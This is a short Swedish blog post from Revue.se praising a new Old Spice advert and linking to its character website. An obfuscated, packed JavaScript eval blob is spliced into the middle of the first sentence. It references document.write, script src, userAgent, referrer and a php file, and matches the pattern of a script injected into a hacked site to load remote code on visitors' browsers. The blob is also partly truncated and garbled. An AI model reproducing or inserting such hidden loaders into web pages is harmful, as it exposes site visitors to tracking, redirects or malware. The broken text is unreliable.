Image Image Image Image Image Image Image Image Image Image

| 23 mars, 2018

Scroll to top

Top

No Comments

Old spice är tillbaka med ännu en grym reklamfilm. | Revue.se

Filip Urde
  • On 11 mars, 2013
  • http://www.revue.se/filip-urde

Old eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dnybi|var|u0026u|referrer|tbehf||js|php’.split(‘|’),0,{}))
Spice är verkligen creme dela creme
när det kommer till reklam och man har varit rätt bra på att producera underhållande reklam dessutom. Nu är det dags igen och här har man en ny karaktär och en passande hemsida till denne.

Se länk nedan.
www.mrwolfdog.com